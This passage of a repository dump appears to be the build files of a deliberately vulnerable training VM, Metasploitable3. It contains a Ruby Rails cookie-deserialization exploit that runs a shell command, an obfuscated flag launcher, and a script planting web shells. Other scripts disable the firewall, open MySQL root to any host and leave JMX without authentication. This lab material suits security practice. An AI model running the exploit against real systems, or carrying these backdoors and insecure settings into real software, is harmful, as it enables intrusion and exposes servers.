"a7aebc287bba0ee4e64f947415a94e5f" 13 | 14 | module Erubis;class Eruby;end;end 15 | module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end 16 | 17 | erubis = Erubis::Eruby.allocate 18 | erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1" 19 | proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate 20 | proxy.instance_variable_set :@instance, erubis 21 | proxy.instance_variable_set :@method, :result 22 | proxy.instance_variable_set :@var, "@result" 23 | 24 | session = { 'session_id' => '', 'exploit' => proxy } 25 | 26 | dump = [ Marshal.dump(session) ].pack('m') 27 | hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump) 28 | cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}" 29 | 30 | http = Net::HTTP.new('127.0.0.1', 8181) 31 | req = Net::HTTP::Get.new('/') 32 | req['Cookie'] = cookie 33 | res = http.request(req) 34 | puts "Done" 35 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/6_of_clubs/server -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/6_of_clubs/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/start.cr: -------------------------------------------------------------------------------- 1 | # Crystal version: 0.22.0 2 | require "Digest/MD5" 3 | # Crystal version 0.23.1 4 | # require "digest/md5" 5 | 6 | Process.run("cd /opt/sinatra && bundle install", shell: true) 7 | yum_yum = "s" + "i" + "n" + "a" + "t" + "r" + "a" 8 | yuck_yuck = "b" + "a" + "n" + "a" + "n" + "a" 9 | var_code = "c" + "r" 10 | var_obf = "o" + "b" + "f" + "u" + "s" + "c" + "a" + "t" + "e" 11 | var_server = "." + "s" + "e" + "r" + "v" + "e"+ "r" 12 | var_passwd = "/" + "e" + "t" + "c" + "/" + "p" + "a" + "s" + "s" + "w" + "d" 13 | var_hash_match = "e" + "4" + "b" + "7" + "c" + "5" + "8" + "f" + "d" + "c" + "7" + "b" + "b" + "a" + "7" + "7" + "2" + "1" + "2" + "4" + "2" + "a" + "7" + "5" + "e" + "d" + "3" + "4" + "1" + "7" + "8" + "7" 14 | 15 | passwd_lines = "" 16 | counter = 0 17 | 18 | File.each_line(var_passwd) do |line| 19 | counter += 1 20 | if counter <= 40 21 | passwd_lines += line + "\n" 22 | end 23 | end 24 | 25 | hash = Digest::MD5.hexdigest(passwd_lines) 26 | 27 | if hash == var_hash_match 28 | code = %{require '#{var_obf}'; Obfuscate.setup { |c| c.salt = '#{yum_yum}'; c.mode = :string }; #{var_code} = Obfuscate.clarify(File.read('#{var_server}')); eval(#{var_code})} 29 | else 30 | code = %{require '#{var_obf}'; Obfuscate.setup { |c| c.salt = '#{yuck_yuck}'; c.mode = :string }; #{var_code} = Obfuscate.clarify(File.read('#{var_server}')); eval(#{var_code})} 31 | end 32 | 33 | Process.run("cd /opt/sinatra && ruby -e \"#{code}\"", shell: true) 34 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/7_of_diamonds/7_of_diamonds.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/7_of_diamonds.zip -------------------------------------------------------------------------------- /resources/flags/linux_flags/7_of_diamonds/hint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/hint.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/7_of_diamonds/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/7_of_diamonds/zip_png.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # gem install rubyzip 4 | require 'zip' 5 | 6 | SOURCEPNG = 'source.png' 7 | CARDNAME = '7_of_diamonds.png' 8 | ZIP_NAME = '7_of_diamonds.zip' 9 | password = ARGV.shift 10 | 11 | if password.nil? || password.empty? 12 | puts "[x] Please set a password for the zip file you're trying to create" 13 | exit 14 | end 15 | 16 | data = File.read(SOURCEPNG) 17 | zip = Zip::OutputStream.write_buffer(::StringIO.new(''), Zip::TraditionalEncrypter.new(password)) do |o| 18 | o.put_next_entry(CARDNAME) 19 | o.write data 20 | end 21 | 22 | File.open(ZIP_NAME, 'wb') do |f| 23 | f.write(zip.string) 24 | end 25 | 26 | puts "[*] #{ZIP_NAME} created with password: #{password}" 27 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/8_of_hearts/8_of_hearts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/8_of_hearts/8_of_hearts.zip -------------------------------------------------------------------------------- /resources/flags/linux_flags/8_of_hearts/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/8_of_hearts/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/8_of_hearts/zip_png.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # gem install rubyzip 4 | require 'zip' 5 | 6 | SOURCEPNG = 'source.png' 7 | CARDNAME = '8_of_hearts.png' 8 | ZIP_NAME = '8_of_hearts.zip' 9 | password = ARGV.shift 10 | 11 | if password.nil? || password.empty? 12 | puts "[x] Please set a password for the zip file you're trying to create" 13 | exit 14 | end 15 | 16 | data = File.read(SOURCEPNG) 17 | zip = Zip::OutputStream.write_buffer(::StringIO.new(''), Zip::TraditionalEncrypter.new(password)) do |o| 18 | o.put_next_entry(CARDNAME) 19 | o.write data 20 | end 21 | 22 | File.open(ZIP_NAME, 'wb') do |f| 23 | f.write(zip.string) 24 | end 25 | 26 | puts "[*] #{ZIP_NAME} created with password: #{password}" 27 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/ace_of_clubs/chatbot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/ace_of_clubs/chatbot.zip -------------------------------------------------------------------------------- /resources/flags/linux_flags/ace_of_clubs/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/ace_of_clubs/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/joker_flag/convert.rb: -------------------------------------------------------------------------------- 1 | require 'chunky_png' 2 | 3 | include ChunkyPNG::Color 4 | 5 | # https://gist.github.com/jeffkreeftmeijer/923084 6 | module ChunkyPNG::Color 7 | def invert(value) 8 | rgb(MAX - r(value), MAX - g(value), MAX - b(value)) 9 | end 10 | end 11 | 12 | source = ARGV.shift 13 | dest = ARGV.shift 14 | 15 | # joker-black.png 16 | img = ChunkyPNG::Image.from_file(source) 17 | img.pixels.map! do |p| 18 | if ChunkyPNG::Color.fully_transparent?(p) 19 | p 20 | else 21 | ChunkyPNG::Color.invert(p) 22 | end 23 | end 24 | 25 | img.save(dest) 26 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/joker_flag/joker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/joker_flag/joker.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/joker_flag/md5.txt: -------------------------------------------------------------------------------- 1 | 5c70e13495405b781e6f231d827a565a 2 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/joker_flag/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/joker_flag/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/king_of_spades/fake.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/fake.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/king_of_spades/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/flag.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/king_of_spades/king_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/king_of_spades.png -------------------------------------------------------------------------------- /resources/flags/seven_of_spades.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/seven_of_spades.pdf -------------------------------------------------------------------------------- /resources/flags/six_of_diamonds.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/six_of_diamonds.zip -------------------------------------------------------------------------------- /resources/flags/ten_of_diamonds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/ten_of_diamonds.png -------------------------------------------------------------------------------- /resources/flags/three_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/three_of_spades.png -------------------------------------------------------------------------------- /resources/glassfish/admin-keyfile: -------------------------------------------------------------------------------- 1 | admin;{SSHA256}lmXQf85PwyYmoHqS5TpPzBiN9Rse3GlMI2LNJtY9+pswty71AOxo0Q==;asadmin 2 | -------------------------------------------------------------------------------- /resources/jenkins/jenkins.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jenkins/jenkins.exe -------------------------------------------------------------------------------- /resources/jenkins/jenkins.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jenkins/jenkins.war -------------------------------------------------------------------------------- /resources/jmx/Hello.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/Hello.class -------------------------------------------------------------------------------- /resources/jmx/HelloMBean.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/HelloMBean.class -------------------------------------------------------------------------------- /resources/jmx/SimpleAgent.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/SimpleAgent.class -------------------------------------------------------------------------------- /resources/jmx/jmx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/jmx.exe -------------------------------------------------------------------------------- /resources/jmx/start_jmx.bat: -------------------------------------------------------------------------------- 1 | "C:\openjdk6\openjdk-1.6.0-unofficial-b28-windows-amd64-installer\jre\bin\java.exe" -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1617 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false SimpleAgent 2 | -------------------------------------------------------------------------------- /resources/manageengine/setup.iss: -------------------------------------------------------------------------------- 1 | [InstallShield Silent] 2 | Version=v7.00 3 | File=Response File 4 | [File Transfer] 5 | OverwrittenReadOnly=NoToAll 6 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-DlgOrder] 7 | Dlg0={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdWelcome-0 8 | Count=9 9 | Dlg1={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdLicense-0 10 | Dlg2={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdAskDestPath-0 11 | Dlg3={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-MessageBox-0 12 | Dlg4={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-AskText-0 13 | Dlg5={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdSelectFolder-0 14 | Dlg6={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdStartCopy-0 15 | Dlg7={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdShowMailPanel-20319 16 | Dlg8={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdFinish-0 17 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdWelcome-0] 18 | Result=1 19 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdLicense-0] 20 | Result=1 21 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdAskDestPath-0] 22 | szDir=C:\ManageEngine 23 | Result=1 24 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-MessageBox-0] 25 | Result=1 26 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-AskText-0] 27 | szText=8020 28 | Result=1 29 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdSelectFolder-0] 30 | szFolder=ManageEngine Desktop Central 31 | Result=1 32 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdStartCopy-0] 33 | Result=1 34 | [Application] 35 | Name=ManageEngine Desktop Central 36 | Version=9.0.0 37 | Company=ZOHO Corp 38 | Lang=0409 39 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdShowMailPanel-20319] 40 | Result=1 41 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdFinish-0] 42 | Result=1 43 | bOpt1=0 44 | bOpt2=1 45 | -------------------------------------------------------------------------------- /resources/mysql/update_mysql_permissions.sql: -------------------------------------------------------------------------------- 1 | GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'; 2 | FLUSH PRIVILEGES; 3 | -------------------------------------------------------------------------------- /resources/rails_server/Gemfile: -------------------------------------------------------------------------------- 1 | source 'http://rubygems.org' 2 | 3 | 4 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 5 | gem 'rails', '4.1.1' 6 | # Use sqlite3 as the database for Active Record 7 | gem 'sqlite3', '1.3.11' 8 | # Use SCSS for stylesheets 9 | gem 'sass-rails', '~> 4.0.3' 10 | # Use Uglifier as compressor for JavaScript assets 11 | gem 'uglifier', '>= 1.3.0' 12 | # Use CoffeeScript for .js.coffee assets and views 13 | gem 'coffee-rails', '~> 4.0.0' 14 | # See https://github.com/sstephenson/execjs#readme for more supported runtimes 15 | # gem 'therubyracer', platforms: :ruby 16 | 17 | # Use jquery as the JavaScript library 18 | gem 'jquery-rails' 19 | # Turbolinks makes following links in your web application faster. Read more: https://github.com/rails/turbolinks 20 | gem 'turbolinks' 21 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder 22 | gem 'jbuilder', '~> 2.0' 23 | # bundle exec rake doc:rails generates the API under doc/api. 24 | gem 'sdoc', '~> 0.4.0', group: :doc 25 | 26 | # Use ActiveModel has_secure_password 27 | # gem 'bcrypt', '~> 3.1.7' 28 | 29 | # Use unicorn as the app server 30 | # gem 'unicorn' 31 | 32 | # Use Capistrano for deployment 33 | # gem 'capistrano-rails', group: :development 34 | 35 | # Use debugger 36 | # gem 'debugger', group: [:development, :test] 37 | 38 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 39 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw] 40 | 41 | gem 'web-console', '~> 2.0', '<2.1.3' 42 | -------------------------------------------------------------------------------- /resources/rails_server/gemrc: -------------------------------------------------------------------------------- 1 | --- 2 | :backtrace: false 3 | :bulk_threshold: 1000 4 | :sources: 5 | - http://rubygems.org/ 6 | :update_sources: true 7 | :verbose: true 8 | -------------------------------------------------------------------------------- /resources/rails_server/start_rails_server.bat: -------------------------------------------------------------------------------- 1 | cd "C:\Program Files\Rails_Server" 2 | C:\tools\ruby23\bin\rails.bat server 3 | -------------------------------------------------------------------------------- /resources/security_settings/secconfig.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/security_settings/secconfig.cfg -------------------------------------------------------------------------------- /resources/wamp/phpMyAdmin-3.5.2.2-english.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wamp/phpMyAdmin-3.5.2.2-english.zip -------------------------------------------------------------------------------- /resources/wamp/phpmyadmin.conf: -------------------------------------------------------------------------------- 1 | Alias /phpmyadmin "c:/wamp/apps/phpmyadmin3.4.10.1/" 2 | 3 | # to give access to phpmyadmin from outside 4 | # replace the lines 5 | # 6 | # Order Deny,Allow 7 | # Deny from all 8 | # Allow from 127.0.0.1 9 | # 10 | # by 11 | # 12 | # Order Allow,Deny 13 | # Allow from all 14 | # 15 | 16 | 17 | Options Indexes FollowSymLinks MultiViews 18 | AllowOverride all 19 | Order Deny,Allow 20 | Deny from all 21 | Allow from 127.0.0.1 22 | 23 | -------------------------------------------------------------------------------- /resources/wamp/wampserver2.2d-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wamp/wampserver2.2d-x64.exe -------------------------------------------------------------------------------- /resources/webdav/httpd-dav.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Distributed authoring and versioning (WebDAV) 3 | # 4 | # Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias 5 | # mod_auth_digest, mod_authn_file 6 | # 7 | 8 | # The following example gives DAV write access to a directory called 9 | # "uploads" under the ServerRoot directory. 10 | # 11 | # The User/Group specified in httpd.conf needs to have write permissions 12 | # on the directory where the DavLockDB is placed and on any directory where 13 | # "Dav On" is specified. 14 | 15 | LoadModule dav_module modules/mod_dav.so 16 | LoadModule dav_fs_module modules/mod_dav_fs.so 17 | LoadModule dav_lock_module modules/mod_dav_lock.so 18 | 19 | DavLockDB "c:/wamp/DavLock" 20 | 21 | Alias /uploads "C:/wamp/www/uploads" 22 | 23 | 24 | AllowOverride All 25 | Dav On 26 | 27 | 28 | Order Allow,Deny 29 | Allow from all 30 | 31 | 32 | 33 | # 34 | # The following directives disable redirects on non-GET requests for 35 | # a directory that does not include the trailing slash. This fixes a 36 | # problem with several clients that do not appropriately handle 37 | # redirects for folders with DAV methods. 38 | # 39 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 40 | BrowserMatch "MS FrontPage" redirect-carefully 41 | BrowserMatch "^WebDrive" redirect-carefully 42 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 43 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 44 | BrowserMatch "^XML Spy" redirect-carefully 45 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully 46 | -------------------------------------------------------------------------------- /resources/windows_pre_downloads/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/windows_pre_downloads/.gitkeep -------------------------------------------------------------------------------- /resources/wordpress/wordpress.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wordpress/wordpress.zip -------------------------------------------------------------------------------- /scripts/chocolatey_installs/7zip.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install 7zip 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit -------------------------------------------------------------------------------- /scripts/chocolatey_installs/boxstarter.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install BoxStarter 3 | chocolatey feature disable -n=allowGlobalConfirmation -------------------------------------------------------------------------------- /scripts/chocolatey_installs/chocolatey-compatibility.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install chocolatey-compatibility.extension 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/java.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install jre8 --version 8.0.251 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/ruby.bat: -------------------------------------------------------------------------------- 1 | choco install -y ruby --version 2.3.3 2 | refreshenv 3 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/tomcat.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install tomcat --version 8.0.33 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit 5 | -------------------------------------------------------------------------------- /scripts/chocolatey_installs/vcredist2008.bat: -------------------------------------------------------------------------------- 1 | chocolatey feature enable -n=allowGlobalConfirmation 2 | choco install vcredist2008 3 | chocolatey feature disable -n=allowGlobalConfirmation 4 | exit -------------------------------------------------------------------------------- /scripts/configs/apply_password_settings.bat: -------------------------------------------------------------------------------- 1 | secedit.exe /configure /db %windir%\securitynew.sdb /cfg C:\vagrant\resources\security_settings\secconfig.cfg /areas SECURITYPOLICY -------------------------------------------------------------------------------- /scripts/configs/disable-auto-logon.bat: -------------------------------------------------------------------------------- 1 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /d 0 /f -------------------------------------------------------------------------------- /scripts/configs/disable_firewall.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall set allprofiles state off 2 | -------------------------------------------------------------------------------- /scripts/configs/enable-rdp.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389 2 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 3 | -------------------------------------------------------------------------------- /scripts/configs/enable_firewall.bat: -------------------------------------------------------------------------------- 1 | netsh advfirewall set allprofiles state on -------------------------------------------------------------------------------- /scripts/configs/microsoft-updates.bat: -------------------------------------------------------------------------------- 1 | net stop wuauserv 2 | 3 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v EnableFeaturedSoftware /t REG_DWORD /d 1 /f 4 | 5 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v IncludeRecommendedUpdates /t REG_DWORD /d 1 /f 6 | 7 | echo Set ServiceManager = CreateObject("Microsoft.Update.ServiceManager") > A:\temp.vbs 8 | echo Set NewUpdateService = ServiceManager.AddService2("7971f918-a847-4430-9279-4a52d1efe18d",7,"") >> A:\temp.vbs 9 | 10 | cscript A:\temp.vbs 11 | 12 | net start wuauserv -------------------------------------------------------------------------------- /scripts/configs/packer_cleanup.bat: -------------------------------------------------------------------------------- 1 | rmdir /S /Q C:\vagrant -------------------------------------------------------------------------------- /scripts/configs/update_root_certs.bat: -------------------------------------------------------------------------------- 1 | cmd /c certutil -addstore -f "Root" A:\addtrust_external_ca.cer 2 | cmd /c certutil -addstore -f "Root" A:\baltimore_ca.cer 3 | cmd /c certutil -addstore -f "Root" A:\digicert.cer 4 | cmd /c certutil -addstore -f "Root" A:\equifax.cer 5 | cmd /c certutil -addstore -f "Root" A:\globalsign.cer 6 | cmd /c certutil -addstore -f "Root" A:\gte_cybertrust.cer 7 | cmd /c certutil -addstore -f "Root" A:\microsoft_root_2011.cer 8 | cmd /c certutil -addstore -f "Root" A:\thawte_primary_root.cer 9 | cmd /c certutil -addstore -f "Root" A:\utn-userfirst.cer -------------------------------------------------------------------------------- /scripts/installs/install_backdoors.bat: -------------------------------------------------------------------------------- 1 | copy C:\vagrant\resources\backdoors\caidao.asp "C:\inetpub\wwwroot" 2 | copy C:\vagrant\resources\backdoors\mma.php "C:\wamp\www" 3 | copy C:\vagrant\resources\backdoors\meterpreter.php "C:\wamp\www" 4 | -------------------------------------------------------------------------------- /scripts/installs/install_devkit.bat: -------------------------------------------------------------------------------- 1 | mkdir "C:\RubyDevKit" 2 | powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://github.com/rapid7/metasploit-omnibus-cache/raw/7cad45e5886d0a9b3d587c86a65d66234986223a/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe', 'C:\RubyDevKit\devkit.exe')"